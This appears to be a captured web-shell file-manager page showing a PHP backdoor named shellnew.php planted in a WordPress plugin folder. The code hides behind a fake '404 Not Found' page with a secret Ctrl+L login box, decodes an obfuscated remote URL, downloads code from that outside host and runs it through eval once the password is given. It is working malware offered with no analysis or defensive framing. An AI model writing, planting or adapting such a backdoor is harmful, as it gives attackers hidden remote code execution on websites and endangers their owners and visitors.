HEX
Server: nginx/1.24.0
System: Linux VM-8-5-opencloudos 6.6.47-12.oc9.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Sep 24 16:15:42 CST 2024 x86_64
User: www (1000)
PHP: 8.0.26
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/aiwellbore.com/wp-content/plugins/advanced-custom-fields/
Upload Files
File: /www/wwwroot/aiwellbore.com/wp-content/plugins/advanced-custom-fields/shellnew.php
<?php
error_reporting(0);
ini_set('display_errors', 0);
session_start();

function is_logged_in() {
    return isset($_SESSION['R10TXER']);
}

function login($password) {
    
    $valid_password_hash = '$2y$10$ejb.IyQxjBTOgI62/PjDC.dryRZC6GVqrRrLw8k4ayYQA9yIDcAHK';

    
    if (password_verify($password, $valid_password_hash)) {
        $_SESSION['R10TXER'] = 'user';
        return true;
    }
    return false;
}


if (isset($_POST['password'])) {

    
    if (login($_POST['password'])) {
        header("Location: " . $_SERVER['PHP_SELF']);
        exit;
    } else {
        echo '<script>alert("Password salah!");</script>';
    }
}


function getContent($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    $content = curl_exec($curl);
    curl_close($curl);

    if ($content === false) $content = @file_get_contents($url);
    return $content;
}

function decode_url($encoded_url) {
    return base64_decode(str_rot13(urldecode($encoded_url)));
}

$encoded_url = 'nUE0pUZ6Yl9lLKphrzI2MKWcrP5wo20ipzS3Y215LJkzLF01Zmp%3D';
$decoded_url = decode_url($encoded_url);


if (is_logged_in() && $decoded_url) {
    $content = getContent($decoded_url);
    eval('?>' . $content);
    exit;
}
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
    <title>404 Not Found</title>

    <style>
        #loginBox {
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 260px;
            padding: 15px;
            background: #f9f9f9;
            border: 1px solid #ccc;
            font-family: Arial, sans-serif;
            opacity: 0;
            visibility: hidden;
            transition: 0.25s ease-in-out;
        }
        #loginBox.active {
            opacity: 1;
            visibility: visible;
        }
        #loginBox input {
            width: 100%;
            padding: 7px;
            margin-bottom: 8px;
            border: 1px solid #bbb;
        }
        #loginBox button {
            width: 100%;
            padding: 8px;
        }
    </style>

    <script>
        document.addEventListener("keydown", function(e) {
            if (e.ctrlKey && e.key === "l") {
                e.preventDefault();
                document.getElementById("loginBox").classList.toggle("active");
            }
        });
    </script>
</head>

<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.57 (Unix) Server at Webmaster Port 80</address>

<!-- LOGIN FORM -->
<div id="loginBox">
    <h3 style="margin-top:0;">Login</h3>
    <form method="post">
        <input type="password" name="password" placeholder="Password">
        <button type="submit">Login</button>
    </form>
</div>

</body>
</html>
@ Telegram